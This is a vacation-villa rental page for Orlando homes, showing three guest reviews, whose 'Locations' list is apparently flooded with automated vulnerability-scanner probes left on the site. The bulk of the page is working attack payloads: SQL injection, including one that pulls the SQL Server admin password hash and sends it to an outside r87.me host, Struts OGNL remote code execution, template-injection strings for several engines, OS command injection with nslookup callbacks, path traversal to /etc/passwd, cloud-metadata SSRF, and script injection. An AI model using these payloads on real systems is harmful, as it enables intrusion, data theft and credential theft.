- "Beautiful, just beautiful. Kids loved the pool and spa, Dave loved the big screen TV and the internet let me keep up with work."Debbie Bates
- "We had a very nice month of March in the Oasis Villa. Found the house very clean & the pool heated to our satisfaction. It is in a very well kept & very quiet community. Very close to all Restaurants & Stores. Would recommend it to everybody"Joe Bower
- "We had a memorable time, the home was beautiful, clean. It was perfect, it was a comfortable, a home away from home. Disney, and Universal were approx. 30 min away, it was extremely close to shopping. Our family had a wonderful time."Yasmina Garcia
|
Locations |
|
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 |
|
|
+print(int)0xFFF9999-74007;// |
|
|
1');SELECT pg_sleep(25)-- |
|
|
www.orlandovillas4u.com/trace.axd |
|
|
http://169.254.169.254/opc/v1/instance |
|
|
gethostbyname(trim('lzwjvpavdctpphsxgnlojf7fc7rqkcjg_ximlqe-'.'_lg.r87.me')) |
|
|
'{${gethostbyname(trim('lzwjvpavdcya-nkbrfklhgiz4mys6o_kocxb2x3a'.'kaq.r87.me'))}}' |
|
|
"+gethostbyname(lc 'lzwjvpavdcmhxewl2r2qwj-tttn2xecz03vdonjq'.'eyo.r87.me')+" |
|
|
p "#{0xFFF9999.to_i-`echo 17243`.to_i}" |
|
|
n;ns:expression(netsparker(0x06DCD3)); |
|
|
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.lzwjvpavdcqeqign-tgbz1fpmqlcpx8lh6kp1nop'+'yi0.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''') |
|
|
/../../../../../../../../../../var/log/nginx/access.log |
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "lzwjvpavdcagtmqqkqxmj1dtv7irya56vvn3xndk"uoe.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
/../../../../../../../../../../etc/httpd/logs/error_log |
|
|
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdch-flgfcm29eyxgyt5gvffv3ryndend'+'iue.r87.me')exec sp_executesql @r-- |
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd |
|
|
//lzwjvpavdckwhdj9g-48jggqotlfkg6xzmccfjfwht0.r87.me |
|
|
1'));SELECT pg_sleep(25)-- |
|
|
https://metadata.packet.net/metadata |
|
|
php://filter//resource=http://lzwjvpavdckmjzrh86a7-jikt9vlx7dyqz7c7m_x_0b.r87.me/p/ |
|
|
/../../../../../../../../../../opt/lampp/logs/access_log |
|
|
((select sleep(25)))a-- 1 |
|
|
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='56227').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())} |
|
|
__import__('os').popen(('expr 268409241 - {0}').format('55504')).read() |
|
|
1;expr 268409241 - 90136;x |
|
|
nslookup lzwjvpavdc3t66zfylvjo_wcejzdlqdxfheioeci^ki8.r87.me&'\"`0&nslookup lzwjvpavdc3t66zfylvjo_wcejzdlqdxfheioeci^ki8.r87.me&`' |
|
|
{{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbHp3anZwYXZkY2MydW55d3R5eHZ1YnAxZHNqcXhpeWd3Y2xhcjFudnZ2Zy5yODcubWU=')).read()}} |
|
|
createobject("WScript.Shell").exec("nslookup lzwjvpavdchwp02mgy2dbhk5b8tjsgqasrfdzv13" & "ijs.r87.me").StdOut.ReadAll |
|
|
body{x:expression(netsparker(0x06DCEF))} |
|
|
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini |
|
|
/../../../../../../../../../../var/log/lighttpd/access.log |
|
|
SELECT dblink_connect('host=lzwjvpavdcjvuws1gdo_injvab71srte1tz4g-wd'||'enw.r87.me user=a password=a connect_timeout=2') |
|
|
'"@-->netsparker(0x06DE37) |
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd |
|
|
1;exec('xp_dirtree ''\\lzwjvpavdc0-onpgkvy_tjnejhz7-rcha4qoqjed'+'gmi.r87.me'+'\c$\a''')-- |
|
|
1));SELECT pg_sleep(25)-- |
|
|
/../../../../../../../../../../var/log/apache2/error.log |
|
|
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) |
|
|
'+print(int)0xFFF9999-73072+' |
|
|
' WAITFOR DELAY '0:0:25'-- |
|
|
http://aws.r87.me/latest/meta-data/public-hostname |
|
|
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' |
|
|
1 WAITFOR DELAY '0:0:25'-- |
|
|
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
gethostbyname(trim('lzwjvpavdc_qzftrnadr0ezhdwn2-bcxxdlic0a6'.'3kq.r87.me')); |
|
|
/../../../../../../../../../../AppServ/Apache24/logs/access.log |
|
|
"& SET /A 0xFFF9999-19988 & |
|
|
{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnYkhwM2FuWndZWFprWTNObWVteHliMmg1WW05cE5YcHBlSFJsY0hKamFXdDJkbWQ1Y1c1MWFXVnpaeTV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %} |
|
|
& nslookup lzwjvpavdcmhjbkmjoat6a64vtn1ekx8aqambmbz^oru.r87.me&'\"`0&nslookup lzwjvpavdcmhjbkmjoat6a64vtn1ekx8aqambmbz^oru.r87.me&`' |
|
|
__import__('os').popen(('SET /A 268409241 - {0}').format('30853')).read() |
|
|
lzwjvpavdcrpkolkgkj6mmcekl3sm5yzius4gsowfrt.r87.me/p/ |
|
|
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) |
|
|
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) |
|
|
http://r87.me/r/?id=lzwjvpavdcj25zbdopxj6gt9okpxj2xwkf71t-_uqr4 |
|
|
print localtime()*0+0xFFF9999-40206 |
|
|
'"-->netsparker(0x06DB54) |
|
|
"& ping -n 25 127.0.0.1 & |
|
|
((SELECT(1)FROM(SELECT(SLEEP(25)))A)) |
|
|
1/../../../../../../../../../../../etc/passwd |
|
|
dblink_connect('host=lzwjvpavdctcekixjuwgvlj9xgupfmqrl2o57kri'||'coi.r87.me user=a password=a connect_timeout=2') |
|
|
/../../../../../../../../../../boot.ini |
|
|
-1';exec('xp_dirtree ''\\lzwjvpavdcsh1yjqg61bja__zjmcqan8f8eo_dz1'+'4wm.r87.me'+'\c$\a''')-- |
|
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdczw7fweuxljbic5vmme7rbmvp0cj2w1" & "roa.r87.me").StdOut.ReadAll |
|
|
/../../../../../../../../../../var/log/apache/error.log |
|
|
../../../../../../../../../../xampp/apache/logs/access.log |
|
|
%22%2bnetsparker(0x06DEB0)%2b%22 |
|
|
*/netsparker(0x06DD0A);/* |
|
|
http://169.254.169.254/latest/meta-data/public-hostname |
|
|
'& SET /A 0xFFF9999-53775 & |
|
|
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini |
|
|
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' |
|
|
1) WAITFOR DELAY '0:0:25'-- |
|
|
= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkYzN0bGR6dGpoZWZ3ZzJoYW9jbTV5bmp5cmRzeTRkcW5hby5yODcubWU=','base64').toString()) |
|
|
'& nslookup lzwjvpavdcofrsuhktvuj15u19b9ld5ihddf7uhi^qag.r87.me&'\"`0&nslookup lzwjvpavdcofrsuhktvuj15u19b9ld5ihddf7uhi^qag.r87.me&`' |
|
|
response.write(268409241-80122)' |
|
|
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x06DB92%29%3C%2FscRipt%3E |
|
|
/../../../../../../../../../../var/log/apache/access.log |
|
|
'& ping -n 25 127.0.0.1 & |
|
|
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 |
|
|
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
/../../../../../../../../../../boot.ini .cfm |
|
|
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) |
|
|
cast((SELECT dblink_connect('host=lzwjvpavdcyynatfmhtbfh1c36m0olt-pgwe24ic'||'duo.r87.me user=a password=a connect_timeout=2')) as numeric) |
|
|
"+print(int)0xFFF9999-79957+" |
|
|
') WAITFOR DELAY '0:0:25'-- |
|
|
/../../../../../../../../../../proc/version |
|
|
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' |
|
|
eval('print localtime()*0+0xFFF9999-81994') |
|
|
+createobject("WScript.Shell").exec("nslookup lzwjvpavdcxrleq9hpcchdiajeivkhx5gwu-wyc0" & "bkg.r87.me").StdOut.ReadAll+ |
|
|
& SET /A 0xFFF9999-79316 & |
|
|
1) exec('xp_dirtree ''\\lzwjvpavdcglv1hqcxd_ksnqzrofr3n4x_j1umqt'+'hzc.r87.me'+'\c$\a''')-- |
|
|
<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgbHp3anZwYXZkY2p0Mm5qeGtzaGRwOWJxaTUtY2RlMmIxODFicHp2bHA5cS5yODcubWU=','base64').toString()) %> |
|
|
+gethostbyname(trim('lzwjvpavdcnpcwvjbra03po6z4aunnuzvawzuykn'.'5i4.r87.me'));// |
|
|
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' |
|
|
+response.write(268409241-24713)' |
|
|
/../../../../../../../../../../web.config |
|
|
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini |
|
|
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDZEQkI5KTwvc2NyaXB0Pg== |
|
|
"& nslookup lzwjvpavdcvu5dpg454xep-jv9chlvegsj4yvxgp^tee.r87.me&'\"`0&nslookup lzwjvpavdcvu5dpg454xep-jv9chlvegsj4yvxgp^tee.r87.me&`' |
|
|
')) WAITFOR DELAY '0:0:25'-- |
|
|
1/../../../../../../../../../../boot.ini |
|
|
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(45)||chr(106)||chr(118)||chr(118)||chr(120)||chr(122)||chr(116)||chr(99)||chr(117)||chr(55)||chr(114)||chr(106)||chr(112)||chr(105)||chr(100)||chr(114)||chr(57)||chr(117)||chr(118)||chr(100)||chr(116)||chr(117)||chr(115)||chr(55)||chr(104)||chr(115)||chr(53)||chr(98)||chr(116)||chr(105)||chr(118)||chr(120)||chr(113)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric) |
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
|
|
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) |
|
|
/../../../../../../../../../../proc/version .cfm |
|
|
{php}Smarty_Resource::parseResourceName(system("nslookup lzwjvpavdcpmnncr4j8omglc0g-jnxs66guk7ixv"."t7c.r87.me"),'b');{/php} |
|
|
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" |
|
|
1)) WAITFOR DELAY '0:0:25'-- |
|
|
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 |
|
|
'+print localtime()*0+0xFFF9999-72452+' |
|
|
"+response.write(268409241-92189)+" |
|
|
<%createobject("WScript.Shell").exec("nslookup lzwjvpavdcmhksvi9ywssiuyl-o2gcxgxarvwcnx" & "q1c.r87.me").StdOut.ReadAll%> |
|
|
'||(SELECT dblink_connect('host=lzwjvpavdcsixdo7tudiiweeo8f9q4bezfo3zzsz'||'oqg.r87.me user=a password=a connect_timeout=2'))||' |
|
|
1')exec('xp_dirtree ''\\lzwjvpavdcvlzmx2nxsvdxajo1ialjkw5578ykhl'+'qxg.r87.me'+'\c$\a''')-- |
|
|
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) |
|
|
data:;base64,TlM3NzU0NTYxNDQ2NTc1 |
|
|
'" ns=netsparker(0x06DBE3) |
|
|
=(int)0xFFF9999-40449;//?> |
|
|
nslookup "lzwjvpavdc4z8rwxfyiyd-tqskrd0ofxji6qixd_""o_w.r87.me" |
|
|
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini |
|
|
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) |
|
|
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
php://filter//resource=http://r87.com/n? .cfm |
|
|
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' |
|
|
/../../../../../../../../../../../etc/passwd |
|
|
'+gethostbyname(trim('lzwjvpavdcvv2egv-lwp3lebsohebfqhah6qvwsr'.'puu.r87.me'))+' |
|
|
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup lzwjvpavdcp25f5om5gc8-iqd7jwxz_hhgyw3cys"~"4yo.r87.me")}} |
|
|
https://www.orlandovillas4u.com/elmah |
|
|
/../../../../../../../../../../windows/win.ini |
|
|
http://r87.com/?www.orlandovillas4u.com/ |
|
|
add_neighborhood_process.cfm |
|
|
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" |
|
|
(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdcoydhfn8cfoqk2qe5rd5ecflnovnq8s'||'uiw.r87.me') from DUAL) |
|
|
<% response.write(268409241-75159) %> |
|
|
1))exec('xp_dirtree ''\\lzwjvpavdc8gdaz0agzvg0yg9myheefp7gp1zpgw'+'tki.r87.me'+'\c$\a''')-- |
|
|
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) |
|
|
"&ping -w 25 127.0.0.1 &" |
|
|
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
"+print localtime()*0+0xFFF9999-23988+" |
|
|
javascript:netsparker(0x06DC99) |
|
|
"+createobject("WScript.Shell").exec("nslookup lzwjvpavdc53xc1i7j453mim8jtojozfldeyc6br" & "rvo.r87.me").StdOut.ReadAll+" |
|
|
&nslookup "lzwjvpavdcrtjtuot0vhjsmf_czzwikofidipm8p""b0s.r87.me" |
|
|
<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgbHp3anZwYXZkY2tiZjlwaHZ5YmlvaTFkLWtka3piYmhrODZnbzJ3eDd5aS5yODcubWU=')})).to_s}" %> |
|
|
http://example.com/?
ns: netsparker056650=vuln |
|
|
1 ns=netsparker(0x06DC16) |
|
|
\';netsparker(0x06DD70);/// |
|
|
/../../../../../../../../../../windows/iis6.log |
|
|
<#assign x=268409241 - 98803>
${x?string["0"]} |
|
|
ns@mail.ns'"/>()%26%25netsparker(0x06E09B) |
|
|
add_neighborhood_process.cfm |
|
|
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' |
|
|
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdczzjuna__agagbmpv2h6z-2pthldpi3'||'4co.r87.me') from DUAL)))) |
|
|
www.orlandovillas4u.com/elmah |
|
|
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' |
|
|
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<
|
|
|
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
{php}print(int)0xFFF9999-73910;{/php} |
|
|
'&nslookup "lzwjvpavdcj5gman2wtkd-q-dxr8lrczq4a3z2xj""bdw.r87.me" |
|
|
print(int)0xFFF9999-98563 |
|
|
gethostbyname(lc 'lzwjvpavdcxudqctj4gkiu0io5ofzvlji4urydik'.'33q.r87.me') |
|
|
1'))exec('xp_dirtree ''\\lzwjvpavdcfa8jjqulqszhi4yhrihjfptw1udoeh'+'jpq.r87.me'+'\c$\a''')-- |
|
|
arguments[1].end(require('child_process').execSync('expr 268409241 - 9402')) |
|
|
/admin/add_neighborhood_process.cfm |
|
|
"+gethostbyname(trim('lzwjvpavdceuppmtwfahfn0tzypzeaa3d3fjm8ud'.'vas.r87.me'))+" |
|
|
'&ping -w 25 127.0.0.1 &' |
|
|
Content-Type:text/html
ns(0x06E0DD) |
|
|
/../../../../../../../../../../../etc/passwd |
|
|
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) |
|
|
http://62.106.91.181:3306 |
|
|
/../../../../../../../../../../proc/self/fd/2 |
|
|
ns../../../../../../../../../../../boot.ini....................................................................................................................................................................................... |
|
|
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('lzwjvpavdc6wkwpkg5aljnipsmscof8x4lydrf3i'||'2oe.r87.me') from DUAL))||' |
|
|
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup lzwjvpavdcqnxbesa280t1sikb6l8rlifnjjelzk"+"_8k.r87.me") } |
|
|
//r87.com/n/n.css?0x06DC3D |
|
|
<%= "#{268409241-32368}" %> |
|
|
-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27 |
|
|
http://r87.com/?www.orlandovillas4u.com/ |
|
|
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- |
|
|
";l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdck9jd1zmckozrmwedlph-sp2ffcrkxx"+"xa0.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
"&nslookup "lzwjvpavdctahjh4rzdceo6lh5msmynnk8e2geby""w-a.r87.me" |
|
|
|expr${IFS}268409241${IFS}-${IFS}44507 |
|
|
1";expr 268409241 - 3350;" |
|
|
//r87.com/?http://www.orlandovillas4u.com/ |
|
|
https://www.orlandovillas4u.com/elmah.axd |
|
|
eval('gethostbyname(lc 'lzwjvpavdc-41nxwsczkkq8ru4jlg6zqwmzzsb1a'.'hra.r87.me')') |
|
|
r87.com/?www.orlandovillas4u.com/ |
|
|
syscolumns WHERE 2>3;exec('xp_dirtree ''\\lzwjvpavdcobdggu0bzgnwsi05uhuy9v_hh7fayg'+'abk.r87.me'+'\c$\a''')-- |
|
|
arguments[1].end(require('child_process').execSync('set /A 268409241 - 87281')) |
|
|
/../../../../../../../../../../../etc/passwd .cfm |
|
|
https://www.orlandovillas4u.com/trace.axd |
|
|
(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(100)||chr(115)||chr(112)||chr(119)||chr(111)||chr(114)||chr(101)||chr(116)||chr(105)||chr(99)||chr(122)||chr(105)||chr(115)||chr(118)||chr(122)||chr(97)||chr(113)||chr(100)||chr(116)||chr(101)||chr(122)||chr(100)||chr(51)||chr(119)||chr(49)||chr(119)||chr(103)||chr(115)||chr(104)||chr(102)||chr(114)||chr(111)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL) |
|
|
require 'resolv';Resolv.getaddress ("lzwjvpavdcyvsfn8yynecegloekiva10vwkcwukx".concat "fh0.r87.me") |
|
|
r87.com/?http://www.orlandovillas4u.com/ |
|
|
print(int)0xFFF9999-52857; |
|
|
r87.com/?https://www.orlandovillas4u.com/ |
|
|
'{${print(int)0xFFF9999-87437}}' |
|
|
/../../../../../../../../../../WEB-INF/web.xml |
|
|
/\r87.com/?www.orlandovillas4u.com/ |
|
|
1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ |
|
|
/../../../../../../../../../../proc/self/fd/2 .cfm |
|
|
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand(0)*2))x from INFORMATION_SCHEMA.COLLATIONS group by x limit 1))-- 1 |
|
|
|nslookup${IFS}"lzwjvpavdcamiy80xxfoqex_3fupx50ndxkc1fqg""jf0.r87.me" |
|
|
gethostbyname(trim('lzwjvpavdcetpgwpquyrubrovzf5s9ve1n4xrryn'.'pau.r87.me'));//?> |
|
|
///r87.com/?www.orlandovillas4u.com/ |
|
|
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini |
|
|
<%a style=x:expre/**/ssion(netsparker(0x06DCB5))> |
|
|
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(108)||chr(122)||chr(119)||chr(106)||chr(118)||chr(112)||chr(97)||chr(118)||chr(100)||chr(99)||chr(105)||chr(103)||chr(120)||chr(119)||chr(116)||chr(105)||chr(97)||chr(122)||chr(99)||chr(48)||chr(52)||chr(99)||chr(100)||chr(97)||chr(101)||chr(109)||chr(122)||chr(113)||chr(105)||chr(102)||chr(54)||chr(107)||chr(98)||chr(118)||chr(102)||chr(99)||chr(113)||chr(116)||chr(54)||chr(105)||chr(51)||chr(108)||chr(52)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)))) |
|
|
__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgbHp3anZwYXZkY2pkZmIweXJyc3NtYWprbng1N3Vwb2NjOS1oN3UxeThhdS5yODcubWU=')).read() |
|
|
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','lzwjvpavdcixr4lrvyrtmduafuuo2zfkmunlyivk'+'a98.r87.me')exec sp_executesql @r |
|
|
...//...//...//...//...//...//...//...//...//...//...//etc/passwd |
|
|
www.orlandovillas4u.com.r87.com/? |
|
|
/../../../../../../../../../../windows/win.ini .cfm |
|
|
'+gethostbyname(lc 'lzwjvpavdcenjkeywqen-ii6a2fj4ocrvwzh12if'.'vom.r87.me')+' |
|
|
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-28957)} |
|
|
lzwjvpavdc5bv9zjazqwa5gc0wwcyy94uix3urxokum.r87.me |
|
|
exec('xp_dirtree ''\\lzwjvpavdcyla0u7f4ay3btdkl5wpnmwly5saukz'+'oiq.r87.me'+'\c$\a''') |
|
|
https://www.orlandovillas4u.com/server-status |
|
|
/../../../../../../../../../../var/log/apache2/access.log |
|
|
http://www.orlandovillas4u.com.r87.com/? |
|
|
';l=document.createElement("link");l.rel="prefetch";l.href="//lzwjvpavdc-emk_etasewks6yyozq6rc4yo7dwqx"+"vky.r87.me/r/?"+location.href;document.head.appendChild(l);// |
|
|
https://www.orlandovillas4u.com.r87.com/? |
|
|
1';expr 268409241 - 47144;' |
|
|
www.orlandovillas4u.com/elmah.axd |
|
|
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."lzwjvpavdca83x6pbhxpxtzt2b4oqa_wim9nmo0e""pge.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))} |
|
|
